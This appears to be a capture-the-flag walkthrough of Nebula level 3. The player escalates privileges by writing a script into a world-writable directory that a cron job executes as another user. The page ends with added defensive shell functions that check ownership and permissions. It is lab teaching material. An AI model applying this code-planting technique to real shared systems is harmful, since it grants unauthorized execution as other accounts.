Exploit Exercises - Nebula: Level 3
Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.
We’ll start by examining the files in flag03’s home directory.
level03@nebula:~$ ls -al /home/flag03/
total 6
drwxr-x--- 3 flag03 level03 103 2011-11-20 20:39 .
drwxr-xr-x 1 root root 80 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03 3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03 675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03 3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
level03@nebula:~$ cat /home/flag03/writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
Okay, so we have a directory we can write to, and a script that will gladly execute whatever is in that directory.
The easiest way to run the getflag executable would be to put this simple script into the writable.d directory.
level03@nebula:~$ echo "getflag > /tmp/getflag.log" > /home/flag03/writable.d/getflag
Now we wait a few minutes. The cron job is executed every 3 minutes (you can check this by adding a script that runs crontab -l > /tmp/crontab.log or similar).
level03@nebula:~$ cat /tmp/getflag.log
You have successfully executed getflag on a target account
You could also solve this by changing the password of the flag03 user, but that might be a bit more intrusive :)
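The root cause is visible in the listing above: writable.d is drwxrwxrwx, and writable.sh runs every file in it as flag03. As an added example (not part of the original write-up or the Nebula image), here are the checks a scheduled job could apply before executing anything from a drop directory; the function names dir_is_safe and list_runnable are made up for this sketch.

```sh
#!/bin/sh
# Added example: guard for a "run everything in this directory" cron job.
# dir_is_safe and list_runnable are hypothetical helper names.

# dir_is_safe DIR OWNER
# Succeeds only if DIR is a real directory (not a symlink), is owned by
# OWNER, and cannot be written by group or other. A mode like the
# drwxrwxrwx on writable.d fails this check.
dir_is_safe() {
    dir=$1
    owner=$2
    [ -d "$dir" ] || return 1
    [ ! -L "$dir" ] || return 1
    # -prune limits find to the directory entry itself.
    [ -n "$(find "$dir" -prune -user "$owner")" ] || return 1
    [ -z "$(find "$dir" -prune \( -perm -0020 -o -perm -0002 \))" ] || return 1
    return 0
}

# list_runnable DIR OWNER
# Prints the regular files directly inside DIR that are owned by OWNER and
# not writable by group or other. Prints nothing and fails if DIR is unsafe.
list_runnable() {
    dir_is_safe "$1" "$2" || return 1
    find "$1" -maxdepth 1 -type f -user "$2" ! -perm -0020 ! -perm -0002
}

# How the job's loop could use it (paths and user taken from the page):
#   list_runnable /home/flag03/writable.d flag03 | while IFS= read -r f; do
#       (ulimit -t 5; sh "$f")
#   done
```

With these checks in place the job would refuse to run against writable.d as shipped, and a file dropped by level03 would be skipped because it is not owned by flag03.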